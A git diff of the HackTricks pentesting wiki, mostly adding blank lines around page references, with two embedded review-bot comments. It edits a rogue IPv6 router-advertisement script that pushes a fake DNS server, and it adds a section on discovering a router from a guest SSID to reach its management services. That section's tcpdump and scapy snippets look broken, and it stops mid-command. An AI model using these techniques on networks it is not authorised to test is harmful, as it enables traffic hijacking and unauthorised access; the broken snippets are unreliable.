a/src/binary-exploitation/libc-heap/tcache-bin-attack.md +++ b/src/binary-exploitation/libc-heap/tcache-bin-attack.md 
@@ -6,6 +6,7 @@ For more information about what is a Tcache bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -47,4 +48,3 @@ Usually it's possible to find at the beginning of the heap a chunk containing th {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md index 07a647aa0..1bd9b4477 100644 --- a/src/binary-exploitation/libc-heap/unsorted-bin-attack.md +++ b/src/binary-exploitation/libc-heap/unsorted-bin-attack.md @@ -6,6 +6,7 @@ For more information about what is an unsorted bin check this page: + {{#ref}} bins-and-memory-allocations.md {{#endref}} @@ -73,4 +74,3 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/libc-heap/use-after-free/README.md b/src/binary-exploitation/libc-heap/use-after-free/README.md index d1e45e846..400d72280 100644 --- a/src/binary-exploitation/libc-heap/use-after-free/README.md +++ b/src/binary-exploitation/libc-heap/use-after-free/README.md @@ -13,6 +13,7 @@ The problem here is that it's not ilegal (there **won't be errors**) when a **fr A first fit attack targets the way some memory allocators, like in glibc, manage freed memory. When you free a block of memory, it gets added to a list, and new memory requests pull from that list from the end. Attackers can use this behavior to manipulate **which memory blocks get reused, potentially gaining control over them**. This can lead to "use-after-free" issues, where an attacker could **change the contents of memory that gets reallocated**, creating a security risk.\ Check more info in: + {{#ref}} first-fit.md {{#endref}} @@ -20,4 +21,3 @@ first-fit.md {{#include ../../../banners/hacktricks-training.md}} - 
diff --git a/src/binary-exploitation/rop-return-oriented-programing/README.md b/src/binary-exploitation/rop-return-oriented-programing/README.md index 23e170e92..e484f4887 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/README.md @@ -152,6 +152,7 @@ In this example: Check the following page for this information: + {{#ref}} ../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -168,18 +169,21 @@ Notice that ROP is just a technique in order to execute arbitrary code. Based in - **Ret2lib**: Use ROP to call arbitrary functions from a loaded library with arbitrary parameters (usually something like `system('/bin/sh')`. + {{#ref}} ret2lib/ {{#endref}} - **Ret2Syscall**: Use ROP to prepare a call to a syscall, e.g. `execve`, and make it execute arbitrary commands. + {{#ref}} rop-syscall-execv/ {{#endref}} - **EBP2Ret & EBP Chaining**: The first will abuse EBP instead of EIP to control the flow and the second is similar to Ret2lib but in this case the flow is controlled mainly with EBP addresses (although t's also needed to control EIP). + {{#ref}} ../stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md {{#endref}} @@ -195,4 +199,3 @@ rop-syscall-execv/ {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md index d588683c0..56771fb14 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2csu.md @@ -79,6 +79,7 @@ Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by acc Check this page for more info: + {{#ref}} brop-blind-return-oriented-programming.md {{#endref}} 
@@ -184,4 +185,3 @@ Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protec {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md index 7a533a75b..a8e80f3f7 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2dlresolve.md @@ -17,6 +17,7 @@ Usually, all these structures are faked by making an **initial ROP chain that ca Chek this video for a nice explanation about this technique in the second half of the video: + {{#ref}} https://youtu.be/ADULSwnQs-s?feature=shared {{#endref}} @@ -197,4 +198,3 @@ target.interactive() - 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`. {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md index 94281bf4c..52a250b0c 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/README.md 
@@ -61,12 +61,14 @@ In this case it is loaded in **0xb75dc000** (This will be the base address of li It might be possible that you **don't know the libc the binary is loading** (because it might be located in a server where you don't have any access). In that case you could abuse the vulnerability to **leak some addresses and find which libc** library is being used: + {{#ref}} rop-leaking-libc-address/ {{#endref}} And you can find a pwntools template for this in: + {{#ref}} rop-leaking-libc-address/rop-leaking-libc-template.md {{#endref}} @@ -91,6 +93,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000): Execute a shell just jumping to **one** specific **address** in libc: + {{#ref}} one-gadget.md {{#endref}} @@ -119,6 +122,7 @@ for off in range(0xb7000000, 0xb8000000, 0x1000): Check the example from: + {{#ref}} ../ {{#endref}} @@ -131,6 +135,7 @@ Also in ARM64 an instruction does what the instruction does (it's not possible t Check the example from: + {{#ref}} ret2lib-+-printf-leak-arm64.md {{#endref}} @@ -143,6 +148,7 @@ This allows to **leak information from the process** by calling `printf`/`puts` This basically means abusing a **Ret2lib to transform it into a `printf` format strings vulnerability** by using the `ret2lib` to call printf with the values to exploit it (sounds useless but possible): + {{#ref}} ../../format-strings/ {{#endref}} @@ -165,4 +171,3 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md index 62158da13..0f071f85d 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/README.md 
@@ -38,6 +38,7 @@ gcc -o vuln vuln.c -fno-stack-protector -no-pie Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script: + {{#ref}} rop-leaking-libc-template.md {{#endref}} @@ -265,6 +266,7 @@ rop2 = base + p64(ONE_GADGET) + "\x00"*100 You can find a template to exploit this vulnerability here: + {{#ref}} rop-leaking-libc-template.md {{#endref}} @@ -304,4 +306,3 @@ BINSH = next(libc.search("/bin/sh")) - 64 {{#include ../../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md index 7cf6ba6d0..4cfc40a55 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md +++ b/src/binary-exploitation/rop-return-oriented-programing/ret2vdso.md @@ -62,6 +62,7 @@ pop_ebx_pop_esi_pop_ebp_ret = vdso_addr + 0x15cd After dumping and checking the vdso section of a binary in kali 2023.2 arm64, I couldn't find in there any interesting gadget (no way to control registers from values in the stack or to control x30 for a ret) **except a way to call a SROP**. Check more info int eh example from the page: + {{#ref}} srop-sigreturn-oriented-programming/srop-arm64.md {{#endref}} @@ -69,4 +70,3 @@ srop-sigreturn-oriented-programming/srop-arm64.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md index 6bdc7083c..4c30698b2 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/README.md 
@@ -110,6 +110,7 @@ rop += writeGadget #Address to: mov qword ptr [rax], rdx If you are **lacking gadgets**, for example to write `/bin/sh` in memory, you can use the **SROP technique to control all the register values** (including RIP and params registers) from the stack: + {{#ref}} ../srop-sigreturn-oriented-programming/ {{#endref}} @@ -195,4 +196,3 @@ target.interactive() {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md index d0ce408f6..90716bbe4 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/rop-syscall-execv/ret2syscall-arm64.md @@ -4,6 +4,7 @@ Find an introduction to arm64 in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -12,6 +13,7 @@ Find an introduction to arm64 in: We are going to use the example from the page: + {{#ref}} ../../stack-overflow/ret2win/ret2win-arm64.md {{#endref}} @@ -128,4 +130,3 @@ p.interactive() {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md index 047a9d7be..efd7eb2e5 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/README.md 
@@ -15,6 +15,7 @@ The interesting part is how **`sigreturn`** restores the program's state: it doe Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls: + {{#ref}} ../rop-syscall-execv/ {{#endref}} @@ -59,6 +60,7 @@ If you are curious this is the **sigcontext structure** stored in the stack to l For a better explanation check also: + {{#ref}} https://youtu.be/ADULSwnQs-s?feature=shared {{#endref}} @@ -145,4 +147,3 @@ target.interactive() - SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed. {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md index 3b71ab827..45382d85c 100644 --- a/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md +++ b/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md @@ -179,12 +179,14 @@ p.interactive() For more info about vdso check: + {{#ref}} ../ret2vdso.md {{#endref}} And to bypass the address of `/bin/sh` you could create several env variables pointing to it, for more info: + {{#ref}} ../../common-binary-protections-and-bypasses/aslr/ {{#endref}} diff --git a/src/binary-exploitation/stack-overflow/README.md b/src/binary-exploitation/stack-overflow/README.md index 90764e763..c45d2c3d1 100644 --- a/src/binary-exploitation/stack-overflow/README.md +++ b/src/binary-exploitation/stack-overflow/README.md 
@@ -65,6 +65,7 @@ However, in other scenarios maybe just **overwriting some variables values in th In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) would be disabled) so when the vulnerable function returns, the hidden function will be called: + {{#ref}} ret2win/ {{#endref}} @@ -73,6 +74,7 @@ ret2win/ In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code: + {{#ref}} stack-shellcode/ {{#endref}} @@ -81,6 +83,7 @@ stack-shellcode/ This technique is the fundamental framework to bypass the main protection to the previous technique: **No executable stack (NX)**. And it allows to perform several other techniques (ret2lib, ret2syscall...) that will end executing arbitrary commands by abusing existing instructions in the binary: + {{#ref}} ../rop-return-oriented-programing/ {{#endref}} @@ -89,6 +92,7 @@ This technique is the fundamental framework to bypass the main protection to the An overflow is not always going to be in the stack, it could also be in the **heap** for example: + {{#ref}} ../libc-heap/heap-overflow.md {{#endref}} @@ -97,6 +101,7 @@ An overflow is not always going to be in the stack, it could also be in the **he There are several protections trying to prevent the exploitation of vulnerabilities, check them in: + {{#ref}} ../common-binary-protections-and-bypasses/ {{#endref}} @@ -201,4 +206,3 @@ Lessons learned: {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/stack-overflow/ret2win/README.md b/src/binary-exploitation/stack-overflow/ret2win/README.md index e4c1650c6..a0e8464a3 100644 
--- a/src/binary-exploitation/stack-overflow/ret2win/README.md +++ b/src/binary-exploitation/stack-overflow/ret2win/README.md @@ -108,6 +108,7 @@ The Python script sends a carefully crafted message that, when processed by the ## ARM64 Example + {{#ref}} ret2win-arm64.md {{#endref}} @@ -115,4 +116,3 @@ ret2win-arm64.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md index 8fac862fa..e9f4259d0 100644 --- a/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md +++ b/src/binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md @@ -4,6 +4,7 @@ Find an introduction to arm64 in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -189,4 +190,3 @@ p.close() {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md index 05ba2babe..dafc5af1c 100644 --- a/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md +++ b/src/binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.md @@ -196,6 +196,7 @@ xchg , rsp Check the ret2esp technique here: + {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md {{#endref}} @@ -234,6 +235,7 @@ Modern x86 CPUs and OSes increasingly deploy **CET Shadow Stack (SHSTK)**. With - For background and deeper details see: + {{#ref}} ../common-binary-protections-and-bypasses/cet-and-shadow-stack.md {{#endref}} @@ -287,6 +289,7 @@ Therefore, by default, just abusing the epilogue you **won't be able to control Also in the following page you can see the equivalent of **Ret2esp in ARM64**: + {{#ref}} ../rop-return-oriented-programing/ret2esp-ret2reg.md {{#endref}} 
diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md index 68cf6dc54..1a6ac5fce 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md @@ -4,6 +4,7 @@ Find an introduction to arm64 in: + {{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}} @@ -81,4 +82,3 @@ I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/crypto-and-stego/esoteric-languages.md b/src/crypto-and-stego/esoteric-languages.md index f7935190c..e99d88692 100644 --- a/src/crypto-and-stego/esoteric-languages.md +++ b/src/crypto-and-stego/esoteric-languages.md @@ -52,6 +52,7 @@ Take it to the top Whisper my world ``` + {{#ref}} https://codewithrockstar.com/ {{#endref}} @@ -69,4 +70,3 @@ Kukarek ``` {{#include ../banners/hacktricks-training.md}} - diff --git a/src/crypto-and-stego/hash-length-extension-attack.md b/src/crypto-and-stego/hash-length-extension-attack.md index 6bbfc103c..13f312fd3 100644 --- a/src/crypto-and-stego/hash-length-extension-attack.md +++ b/src/crypto-and-stego/hash-length-extension-attack.md @@ -29,6 +29,7 @@ If an attacker wants to append the string "append" he can: ### **Tool** + {{#ref}} https://github.com/iagox86/hash_extender {{#endref}} @@ -38,4 +39,3 @@ https://github.com/iagox86/hash_extender You can find this attack good explained in [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks) {{#include ../banners/hacktricks-training.md}} - 
diff --git a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md index 03f094366..b2ad63f78 100644 --- a/src/crypto-and-stego/rc4-encrypt-and-decrypt.md +++ b/src/crypto-and-stego/rc4-encrypt-and-decrypt.md @@ -6,13 +6,14 @@ If you can somehow encrypt a plaintext using RC4, you can decrypt any content en If you can encrypt a known plaintext you can also extract the password. More references can be found in the HTB Kryptos machine: + {{#ref}} https://0xrick.github.io/hack-the-box/kryptos/ {{#endref}} + {{#ref}} https://0xrick.github.io/hack-the-box/kryptos/ {{#endref}} {{#include ../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md index a3b9436dd..6be5533c5 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/README.md @@ -4,6 +4,7 @@ ## Creating and Mounting an Image + {{#ref}} ../../generic-methodologies-and-resources/basic-forensic-methodology/image-acquisition-and-mount.md {{#endref}} @@ -12,6 +13,7 @@ This **isn't necessary the first step to perform once you have the image**. But you can use this malware analysis techniques independently if you have a file, a file-system image, memory image, pcap... so it's good to **keep these actions in mind**: + {{#ref}} malware-analysis.md {{#endref}} 
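Review bot: the rc4-encrypt-and-decrypt.md hunk spaces out a duplicated reference instead of removing it: both `{{#ref}}` blocks in that file point to `https://0xrick.github.io/hack-the-box/kryptos/`, so the second block (together with the blank line this hunk adds before it) should be deleted rather than reformatted, otherwise the rendered page lists the same link twice.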
@@ -20,20 +22,24 @@ malware-analysis.md if you are given a **forensic image** of a device you can start **analyzing the partitions, file-system** used and **recovering** potentially **interesting files** (even deleted ones). Learn how in: + {{#ref}} partitions-file-systems-carving/ {{#endref}} Depending on the used OSs and even platform different interesting artifacts should be searched: + {{#ref}} windows-forensics/ {{#endref}} + {{#ref}} linux-forensics.md {{#endref}} + {{#ref}} docker-forensics.md {{#endref}} @@ -43,24 +49,28 @@ docker-forensics.md If you have very **suspicious** **file**, then **depending on the file-type and software** that created it several **tricks** may be useful.\ Read the following page to learn some interesting tricks: + {{#ref}} specific-software-file-type-tricks/ {{#endref}} I want to do a special mention to the page: + {{#ref}} specific-software-file-type-tricks/browser-artifacts.md {{#endref}} ## Memory Dump Inspection + {{#ref}} memory-dump-analysis/ {{#endref}} ## Pcap Inspection + {{#ref}} pcap-inspection/ {{#endref}} @@ -69,12 +79,14 @@ pcap-inspection/ Keep in mind the possible use of anti-forensic techniques: + {{#ref}} anti-forensic-techniques.md {{#endref}} ## Threat Hunting + {{#ref}} file-integrity-monitoring.md {{#endref}} @@ -82,4 +94,3 @@ file-integrity-monitoring.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md index f2d4316c2..659513ff9 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md 
@@ -155,6 +155,7 @@ Linux offers tools for ensuring the integrity of system components, crucial for Read the following page to learn about tools that can be useful to find malware: + {{#ref}} malware-analysis.md {{#endref}} @@ -399,4 +400,3 @@ git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md index e198cea12..baf064c2f 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -195,6 +195,7 @@ As was seen before there are several places where the file is still saved after Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible. + {{#ref}} file-data-carving-recovery-tools.md {{#endref}} @@ -207,6 +208,7 @@ Note that this technique **doesn't work to retrieve fragmented files**. If a fil There are several tools that you can use for file Carving indicating the file types you want to search for + {{#ref}} file-data-carving-recovery-tools.md {{#endref}} @@ -216,6 +218,7 @@ file-data-carving-recovery-tools.md Data Stream Carving is similar to File Carving but **instead of looking for complete files, it looks for interesting fragments** of information.\ For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs. + {{#ref}} file-data-carving-recovery-tools.md {{#endref}} @@ -235,4 +238,3 @@ You may notice that even performing that action there might be **other parts whe {{#include ../../../banners/hacktricks-training.md}} - 
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md index e13f9411a..903715256 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md @@ -23,6 +23,7 @@ The following tools are useful to extract statistics, files, etc. You can find some Wireshark tricks in: + {{#ref}} wireshark-tricks.md {{#endref}} @@ -92,6 +93,7 @@ ngrep -I packets.pcap "^GET" "port 80 and tcp and host 192.168 and dst host 192. Using common carving techniques can be useful to extract files and information from the pcap: + {{#ref}} ../partitions-file-systems-carving/file-data-carving-recovery-tools.md {{#endref}} @@ -133,6 +135,7 @@ suricata -r packets.pcap -c /etc/suricata/suricata.yaml -k none -v -l log Check if you can find any fingerprint of a known malware: + {{#ref}} ../malware-analysis.md {{#endref}} @@ -216,14 +219,17 @@ rita show-exploded-dns -H --limit 10 zeek_logs ## Other pcap analysis tricks + {{#ref}} dnscat-exfiltration.md {{#endref}} + {{#ref}} wifi-pcap-analysis.md {{#endref}} + {{#ref}} usb-keystrokes.md {{#endref}} @@ -233,4 +239,3 @@ usb-keystrokes.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md index e5e497ee7..8d0ad913d 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md 
@@ -4,38 +4,47 @@ Here you can find interesting tricks for specific file-types and/or software: + {{#ref}} .pyc.md {{#endref}} + {{#ref}} browser-artifacts.md {{#endref}} + {{#ref}} desofuscation-vbs-cscript.exe.md {{#endref}} + {{#ref}} local-cloud-storage.md {{#endref}} + {{#ref}} office-file-analysis.md {{#endref}} + {{#ref}} pdf-file-analysis.md {{#endref}} + {{#ref}} png-tricks.md {{#endref}} + {{#ref}} video-and-audio-file-analysis.md {{#endref}} + {{#ref}} zips-tricks.md {{#endref}} @@ -43,4 +52,3 @@ zips-tricks.md {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md index e7401a358..616ef4e6f 100644 --- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md +++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md @@ -266,6 +266,7 @@ In `SAM\Domains\Account\Users` you can obtain the username, the RID, last login, ### Interesting entries in the Windows Registry + {{#ref}} interesting-windows-registry-keys.md {{#endref}} @@ -502,4 +503,3 @@ Security EventID 1102 signals the deletion of logs, a critical event for forensi {{#include ../../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index a98bef336..33636f576 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md 
@@ -479,10 +479,12 @@ echo www | subzuf facebook.com Check this blog post I wrote about how to **automate the subdomain discovery** from a domain using **Trickest workflows** so I don't need to launch manually a bunch of tools in my computer: + {{#ref}} https://trickest.com/blog/full-subdomain-discovery-using-workflow/ {{#endref}} + {{#ref}} https://trickest.com/blog/full-subdomain-brute-force-discovery-using-workflow/ {{#endref}} @@ -641,6 +643,7 @@ You can use the **tool** [**Leakos**](https://github.com/carlospolop/Leakos) to Check also this **page** for potential **github dorks** you could also search for in the organization you are attacking: + {{#ref}} github-leaked-secrets.md {{#endref}} @@ -666,6 +669,7 @@ If you found that the company has **open-source code** you can **analyse** it an **Depending on the language** there are different **tools** you can use: + {{#ref}} ../../network-services-pentesting/pentesting-web/code-review-tools.md {{#endref}} @@ -710,4 +714,3 @@ There are several tools out there that will perform part of the proposed actions - All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/pentesting-network/README.md b/src/generic-methodologies-and-resources/pentesting-network/README.md index 94c4fea52..735e637e2 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/README.md +++ b/src/generic-methodologies-and-resources/pentesting-network/README.md @@ -64,6 +64,7 @@ nmap -T4 -sY -n --open -Pn Here you can find a nice guide of all the well known Wifi attacks at the time of the writing: + {{#ref}} ../pentesting-wifi/ {{#endref}} 
@@ -192,12 +193,14 @@ nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan ### IDS and IPS evasion + {{#ref}} ids-evasion.md {{#endref}} ### **More nmap options** + {{#ref}} nmap-summary-esp.md {{#endref}} @@ -388,6 +391,7 @@ sendp(packet) If you have **access to a switch that you are directly connected to**, you have the ability to **bypass VLAN segmentation** within the network. Simply **switch the port to trunk mode** (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case. + {{#ref}} lateral-vlan-segmentation-bypass.md {{#endref}} @@ -611,6 +615,7 @@ eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt **Cisco Systems engineers have developed two FHRP protocols, GLBP and HSRP.** + {{#ref}} glbp-and-hsrp-attacks.md {{#endref}} @@ -632,6 +637,7 @@ To attack a EIGRP system requires **establishing a neighbourhood with a legitima [**FRRouting**](https://frrouting.org/) allows you to implement **a virtual router that supports BGP, OSPF, EIGRP, RIP and other protocols.** All you need to do is deploy it on your attacker’s system and you can actually pretend to be a legitimate router in the routing domain. + {{#ref}} eigrp-attacks.md {{#endref}} @@ -893,6 +899,7 @@ Bettercap broadcast WSD packets searching for services (UDP Port 3702). ### Telecom / Mobile-Core (GTP) Exploitation + {{#ref}} telecom-network-exploitation.md {{#endref}} @@ -909,4 +916,3 @@ telecom-network-exploitation.md {{#include ../../banners/hacktricks-training.md}} - diff --git a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 878c600e5..d66104014 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md 
@@ -280,11 +280,12 @@ from scapy.all import * import argparse p = argparse.ArgumentParser() -p.add_argument('-i','--interface',required=True) -p.add_argument('--llip',required=True) -p.add_argument('--dns',required=True,help='Fake DNS IPv6') -p.add_argument('--lifetime',type=int,default=600) -p.add_argument('--interval',type=int,default=5) +P = p.add_argument +P('-i','--interface',required=True) +P('--llip',required=True) +P('--dns',required=True,help='Fake DNS IPv6') +P('--lifetime',type=int,default=600) +P('--interval',type=int,default=5) args = p.parse_args() ra = (IPv6(src=args.llip,dst='ff02::1',hlim=255)/ 
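Review bot: the pentesting-ipv6.md argparse change is an unrelated cosmetic refactor that should be dropped from this commit, whose subject only promises FiberGateway content. Aliasing `P = p.add_argument` and then calling `P('-i','--interface',required=True)` saves a few characters but makes the snippet harder to read for someone copying it, and a single uppercase letter as a function name goes against PEP 8 naming. If shorter lines are the goal, keep the explicit `p.add_argument(...)` calls and drop the alias.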
@@ -317,6 +318,58 @@ sudo mitm6 -i eth0 --no-ra # only DHCPv6 poisoning * Disabling IPv6 on endpoints is a temporary workaround that often breaks modern services and hides blind spots – prefer L2 filtering instead. +### NDP Router Discovery on Guest/Public SSIDs and Management Service Exposure + +Many consumer routers expose management daemons (HTTP(S), SSH/Telnet, TR-069, etc.) on all interfaces. In some deployments, the “guest/public” SSID is bridged to the WAN/core and is IPv6-only. Even if the router’s IPv6 changes on every boot, you can reliably learn it using NDP/ICMPv6 and then direct-connect to the management plane from the guest SSID. + +Typical workflow from a client connected to the guest/public SSID: + +1) Discover the router via ICMPv6 Router Solicitation to the All-Routers multicast `ff02::2` and capture the Router Advertisement (RA): + +```bash +# Listen for Router Advertisements (ICMPv6 type 134) +sudo tcpdump -vvv -i 'icmp6 and ip6[40]==134' + +# Provoke an RA by sending a Router Solicitation to ff02::2 +python3 - <<'PY' +from scapy.all import * +send(IPv6(dst='ff02::2')/ICMPv6ND_RS(), iface='') +PY +``` + +The RA reveals the router’s link-local and often a global address/prefix. If only a link-local is known, remember that connections must specify the zone index, e.g. `ssh -6 